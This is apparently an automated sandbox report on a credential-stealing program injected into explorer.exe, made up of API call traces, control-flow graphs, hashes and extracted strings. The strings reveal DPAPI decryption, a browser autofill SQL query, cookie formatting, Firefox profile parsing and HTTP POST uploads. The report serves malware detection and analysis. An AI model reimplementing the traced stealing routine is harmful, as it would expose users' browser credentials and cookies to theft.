                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 02793E74
                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02793E9E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                                                                                                              • String ID: $DPAP$DPAP$IDPAP
                                                                                                                                                                                                              • API String ID: 3076719866-957854035
                                                                                                                                                                                                              • Opcode ID: 2d6b0031a3762b07c655d236607a56ceda146241935e470b4780d0ba06078af6
                                                                                                                                                                                                              • Instruction ID: 6ecf21fc10dfb6d655da44bece24983cc7161f53d517d38a21912250d0e9bdf3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d6b0031a3762b07c655d236607a56ceda146241935e470b4780d0ba06078af6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3021D8726043469BDF11EE69A880A7FB3EEAF84704F850A6DF845D7200EF74CD058B92
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.00000000027F7000.00000040.80000000.00040000.00000000.sdmp, Offset: 027F7000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_27f7000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 2ff8911654aaece41d672be3b9d034ab7d3e1958166fe9fbd3ff54777f1ac0d8
                                                                                                                                                                                                              • Instruction ID: 2101b139fd82adbe593a7862c2b7b74297dbb68fe316514cc1bfd2cde2007c19
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ff8911654aaece41d672be3b9d034ab7d3e1958166fe9fbd3ff54777f1ac0d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DA118B291C752DBD7618E78DCC07B1BBA5EF52224B1C066DCBE19B3C2E760940AC761
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0279116F
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02794BB6
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF), ref: 02794BBF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675517319-0
                                                                                                                                                                                                              • Opcode ID: 5029dd4b673de76b29bff4a40dfb5357f590ada78a6e24b0e18f9044d0ee5b7c
                                                                                                                                                                                                              • Instruction ID: da821c5623a765de954fd07da741f91c031eb7b5bdb20cf810abd3ba06094e20
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5029dd4b673de76b29bff4a40dfb5357f590ada78a6e24b0e18f9044d0ee5b7c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EE09231945310A7CE597B34BC2CB4F3B9E9B95361F10C914A15996080CB3144118A60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0279116F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2580854192-0
                                                                                                                                                                                                              • Opcode ID: ad00dd909b41c04cf0b6d28f9682c90bbfdd9a807d897bd098537ecb8e2ec5ef
                                                                                                                                                                                                              • Instruction ID: 59ab2d199bc77c416ad18ac8c0c61bdfea405270d746968db6a56be78f8744ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad00dd909b41c04cf0b6d28f9682c90bbfdd9a807d897bd098537ecb8e2ec5ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3C04C71C85361A6CE6127A8790CBCA2B1EDF5D266F454881B509AB145CA7688618AB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemInfo.KERNELBASE(027F20A4,00000001,00000000,0000000A,027E3127,027928DA,00000000,?), ref: 0279BFFC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                              • Opcode ID: e454a1a7d97b39aafa3be3b0247a669200676ca88db3109f2f7157256d6d16a8
                                                                                                                                                                                                              • Instruction ID: be2b4584fde0ae7dc142b74830771b6f2c3ae928a9a967755dfcd199741174d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e454a1a7d97b39aafa3be3b0247a669200676ca88db3109f2f7157256d6d16a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0E06D71788310B1FE9133B97C0BF0A1A4E4B80B00F904B11B719A82C8DB9580401826

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 02793C6A
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02793C76
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 02793C7D
                                                                                                                                                                                                              • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02793C89
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 02793D2F
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02793D36
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02793D55
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02793D61
                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02793D89
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02793DB2
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02793DED
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                                                                                                              • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                                                                                                              • API String ID: 2923052733-3488123210
                                                                                                                                                                                                              • Opcode ID: 2c9c722fc6f25e793a20837071f6c607c2918e1d47868f76ba45156d759eb7ff
                                                                                                                                                                                                              • Instruction ID: bbb391a07f56607dff31e415eb708683a00e39717e5a867628ded126b9b87b0e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c9c722fc6f25e793a20837071f6c607c2918e1d47868f76ba45156d759eb7ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B41B730604306ABDF12AB79AC94E3F77AEEF89744F40486CF446A7141DB36DC158B62

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 348 27928f8-27928fa 349 2792ac8-2792ada call 27e3848 DeleteFileW call 2791011 348->349 350 2792900-279291c call 2791000 call 27b02ec 348->350 357 2792adf-2792ae6 349->357 359 2792a8f-2792aa2 call 27afb92 lstrlen 350->359 360 2792922-279293a call 2791fa7 350->360 367 2792ac1-2792ac3 call 2791011 359->367 368 2792aa4-2792abc call 2791798 * 3 359->368 365 2792948-279295f call 2791fa7 360->365 366 279293c-2792942 360->366 376 279296d-2792984 call 2791fa7 365->376 377 2792961-2792967 365->377 366->365 369 2792944 366->369 367->349 368->367 369->365 383 2792992-27929a7 call 2791fa7 376->383 384 2792986-279298c 376->384 377->376 379 2792969 377->379 379->376 388 27929a9-27929af 383->388 389 27929b5-27929cc call 2791fa7 383->389 384->383 385 279298e 384->385 385->383 388->389 390 27929b1 388->390 393 27929da-27929e5 lstrlen 389->393 394 27929ce-27929d4 389->394 390->389 396 2792a79-2792a85 call 27b02ec 393->396 397 27929eb-27929f0 lstrlen 393->397 394->393 395 27929d6 394->395 395->393 396->360 402 2792a8b 396->402 397->396 399 27929f6-2792a11 call 2791000 397->399 404 2792a1b-2792a56 call 2792112 wsprintfA lstrlen 399->404 405 2792a13 399->405 402->359 408 2792a58-2792a68 call 279102f 404->408 409 2792a6a-2792a74 lstrcat call 2791011 404->409 405->404 408->409 409->396
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02792AD2
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 027929E1
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 027929EC
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02792A38
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02792A44
                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02792A6C
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 02792A99
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                                                                                                              • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                                                                                                              • API String ID: 304071051-2605711689
                                                                                                                                                                                                              • Opcode ID: 4bbb6b48b99708160d5388dc290a4d259c4362469adf39d7a9c5617719ca1113
                                                                                                                                                                                                              • Instruction ID: 4aead4a54e9ea627d1fdb7b55bf2045f8f8ffd70efd38eb32074a0f44ad44410
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bbb6b48b99708160d5388dc290a4d259c4362469adf39d7a9c5617719ca1113
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97519F316043479FDF26FF24A854B3F76DAAF89354F04482DF886AB242DB35D8158B62

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 484 2792cb5-2792cc7 call 2791953 488 2792ccd-2792d06 call 2791953 call 2791000 * 2 call 2791b6a 484->488 489 2792e17-2792e2d call 2792ae9 484->489 500 2792df9-2792e12 call 2791011 * 4 488->500 501 2792d0c-2792d1c GetPrivateProfileSectionNamesW 488->501 500->489 501->500 503 2792d22-2792d26 501->503 504 2792d2c-2792d32 503->504 505 2792df5 503->505 507 2792d36-2792d39 504->507 505->500 509 2792ded-2792df1 507->509 510 2792d3f-2792d4d StrStrIW 507->510 509->505 512 2792d53-2792d70 GetPrivateProfileStringW 510->512 513 2792dd7-2792de7 lstrlenW 510->513 512->513 515 2792d72-2792d88 GetPrivateProfileIntW 512->515 513->507 513->509 517 2792d8a-2792d9c call 2791953 515->517 518 2792dcc-2792dd2 call 2792ae9 515->518 523 2792d9e-2792da2 517->523 524 2792db4-2792dca call 2792ae9 call 2791011 517->524 518->513 525 2792dac-2792db2 523->525 526 2792da4-2792daa 523->526 524->513 525->523 525->524 526->525
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
                                                                                                                                                                                                                • Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
                                                                                                                                                                                                                • Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F
                                                                                                                                                                                                              • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 02792D13
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000000,Profile), ref: 02792D45
                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,Path,027E637C,?,00000FFF,?), ref: 02792D68
                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 02792D7B
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 02792DD8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                                                                                                              • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                                                                                              • API String ID: 2234428054-4107377610
                                                                                                                                                                                                              • Opcode ID: 997c515f4c3b74c80a6cde4c8ad8dd7c582b697e60200c6884157d0a94a8683d
                                                                                                                                                                                                              • Instruction ID: fa44e2853dd41a34402cff45f8a8e5b6a90586b23b2f1235809455fad2616755
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 997c515f4c3b74c80a6cde4c8ad8dd7c582b697e60200c6884157d0a94a8683d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA31B330744302ABDE15BF39A81463F77A7AFD8710F40442EED4AAB282DB758856CB52

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 576 2791333-2791385 call 2791000 call 279106c call 27912a3 583 27913a0-27913a3 576->583 584 2791387-279139e 576->584 586 27913aa-27913ac 583->586 587 27913b0-27913b2 584->587 586->587 588 27913b8-27913ef RtlZeroMemory 587->588 589 27915cb-27915da call 2791011 587->589 593 27915c3-27915ca 588->593 594 27913f5-279141a 588->594 593->589 597 27915bf 594->597 598 2791420-2791456 call 27910b1 594->598 597->593 601 2791458 598->601 602 279145d-2791478 598->602 601->602 604 279147e-2791483 602->604 605 27915b5 602->605 606 279149d-27914c7 call 2791000 wsprintfW 604->606 607 2791485-2791496 604->607 605->597 610 27914c9-27914cb 606->610 611 27914e0-2791509 606->611 607->606 612 27914cc-27914cf 610->612 618 279150f-279151b 611->618 619 27915a5-27915b0 call 2791011 611->619 614 27914da-27914dc 612->614 615 27914d1-27914d6 612->615 614->611 615->612 616 27914d8 615->616 616->611 618->619 622 2791521-2791537 call 2791000 618->622 619->605 626 2791539-2791544 622->626 627 2791558-279156f 626->627 628 2791546-2791553 call 279102f 626->628 632 2791571 627->632 633 2791573-279157d 627->633 628->627 632->633 633->626 634 279157f-2791583 633->634 635 279159a-27915a1 call 2791011 634->635 636 2791585 call 279104c 634->636 635->619 639 279158a-2791594 RtlMoveMemory 636->639 639->635
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                                • Part of subcall function 0279106C: lstrlen.KERNEL32(02C67366,00000000,00000000,00000000,02791366,74DE8A60,02C67366,00000000), ref: 02791074
                                                                                                                                                                                                                • Part of subcall function 0279106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02C67366,00000001,00000000,00000000), ref: 02791086
                                                                                                                                                                                                                • Part of subcall function 027912A3: RtlZeroMemory.NTDLL(?,00000018), ref: 027912B5
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 027913C2
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 027914B5
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02791594
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Accept: */*Referer: %S, xrefs: 027914AF
                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 027914FB
                                                                                                                                                                                                              • POST, xrefs: 02791465
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                                                                              • API String ID: 3833683434-704803497
                                                                                                                                                                                                              • Opcode ID: 4c8aae8188a547623de858bdf48a4dc3bdabe705f5d63121bca7b5ef91093f84
                                                                                                                                                                                                              • Instruction ID: 1abd1550f2baa01ad3db835be1b97b193646d75ed4961c218e2a426cee76d484
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c8aae8188a547623de858bdf48a4dc3bdabe705f5d63121bca7b5ef91093f84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86716E70A04302AFDB11DF28E884A2BBBEDEF88354F40492DF959D7251DB31D924CB62

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 667 279b1e5-279b20b 668 279b20d-279b218 call 279aeea 667->668 669 279b221-279b22a 667->669 677 279b3ea-279b3f0 668->677 678 279b21e 668->678 671 279b22c-279b237 call 279ae65 669->671 672 279b240-279b243 669->672 684 279b23d 671->684 685 279b3b4-279b3b7 671->685 675 279b3b9-279b3d3 672->675 676 279b249-279b26b call 279a7ae 672->676 679 279b3db-279b3df 675->679 687 279b26d-279b278 676->687 688 279b296-279b29f 676->688 678->669 682 279b3e8 679->682 683 279b3e1-279b3e3 679->683 682->677 683->682 690 279b3e5-279b3e7 683->690 684->672 685->675 689 279b3d5-279b3d8 685->689 691 279b27d-279b291 call 279a1c6 687->691 692 279b2a1 688->692 693 279b2d6-279b2ea call 2796a5a 688->693 689->679 690->682 691->685 695 279b2a9-279b2ad 692->695 696 279b2a3-279b2a7 692->696 702 279b2ec-279b2f1 693->702 703 279b2f6-279b2fd 693->703 695->685 697 279b2b3-279b2b9 call 279a67c 695->697 696->693 696->695 704 279b2be-279b2c2 697->704 702->685 706 279b2ff-279b30e 703->706 707 279b373 703->707 704->693 708 279b2c4-279b2d4 704->708 709 279b377-279b37a 706->709 707->709 708->691 710 279b37c 709->710 711 279b310-279b329 CreateFileMappingW 709->711 710->685 712 279b32b-279b357 MapViewOfFile 711->712 713 279b37e-279b3ab call 279a1c6 711->713 712->713 714 279b359-279b370 712->714 713->685 718 279b3ad 713->718 714->707 718->685
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0279B31D
                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0279B34F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateMappingView
                                                                                                                                                                                                              • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                              • API String ID: 3452162329-3826999013
                                                                                                                                                                                                              • Opcode ID: 8277392e44b609420e3d65282089b21eb43d75e510da7d7795c25c444fbc7da5
                                                                                                                                                                                                              • Instruction ID: b8c3c43dba2ec30129f7ab9d6f2491d4a26573104ebd7cae120ef025d9829f5a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8277392e44b609420e3d65282089b21eb43d75e510da7d7795c25c444fbc7da5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3518071604741DFDF25CF18E885A6B77F6FB88318F10992EE9868B290DB70E815CB51

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 719 279a40e-279a424 720 279a4a2-279a4aa 719->720 721 279a426-279a42a 719->721 722 279a4ae-279a4c8 720->722 723 279a42c-279a42f 721->723 724 279a431-279a441 721->724 725 279a4cc-279a4e3 ReadFile 722->725 723->720 723->724 726 279a469-279a4a0 memcpy 724->726 727 279a443 724->727 728 279a4e5-279a4ee 725->728 729 279a524-279a538 call 279a2aa 725->729 726->722 730 279a44a-279a45a memcpy 727->730 731 279a445-279a448 727->731 728->729 737 279a4f0-279a4ff call 279a250 728->737 733 279a45d 729->733 738 279a53e-279a553 memset 729->738 730->733 731->726 731->730 736 279a45f-279a466 733->736 737->725 741 279a501-279a51f call 279a1c6 737->741 738->736 741->736
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$FileReadmemset
                                                                                                                                                                                                              • String ID: winRead
                                                                                                                                                                                                              • API String ID: 2051157613-2759563040
                                                                                                                                                                                                              • Opcode ID: 90600da17ac448acb85fee18c36dafdaf16f9699d755f67e52a954b37b54779d
                                                                                                                                                                                                              • Instruction ID: 6b6bbd8ada2ddf9ce6f3d78aab10f16a82219952e5cc2aff4678f28ac81a8ccd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90600da17ac448acb85fee18c36dafdaf16f9699d755f67e52a954b37b54779d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A131AF7260A304AFCB40DE68DD8899F77E6EFC8314F845928FD8597220D730EC048B92

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIW.KERNELBASE(?,?), ref: 02792E4B
                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02792EE4
                                                                                                                                                                                                              • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02792F54
                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 02792F62
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A1E
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A3C
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A75
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A98
                                                                                                                                                                                                                • Part of subcall function 02791BC5: lstrlenW.KERNEL32(00000000,00000000,?,02792E75,PathToExe,00000000,00000000), ref: 02791BCC
                                                                                                                                                                                                                • Part of subcall function 02791BC5: StrStrIW.SHLWAPI(00000000,.exe,?,02792E75,PathToExe,00000000,00000000), ref: 02791BF0
                                                                                                                                                                                                                • Part of subcall function 02791BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02792E75,PathToExe,00000000,00000000), ref: 02791C05
                                                                                                                                                                                                                • Part of subcall function 02791BC5: lstrlenW.KERNEL32(00000000,?,02792E75,PathToExe,00000000,00000000), ref: 02791C1C
                                                                                                                                                                                                                • Part of subcall function 02791AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02792E83,PathToExe,00000000,00000000), ref: 02791B16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                                                                                                              • String ID: PathToExe
                                                                                                                                                                                                              • API String ID: 1799103994-1982016430
                                                                                                                                                                                                              • Opcode ID: 712f75f5ee418676c928319df01063aef2097ad555cb9f6e6c0101a7af262e7e
                                                                                                                                                                                                              • Instruction ID: 54d5d1e5328b64fca87712d2703c42fd4837a74f6e2d0c4eb1a9060b6e1a3769
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 712f75f5ee418676c928319df01063aef2097ad555cb9f6e6c0101a7af262e7e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E318D71604312AF9F16AF25A848C7F7AAAEFC8350B00851CFC5997240EB34C911CFA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
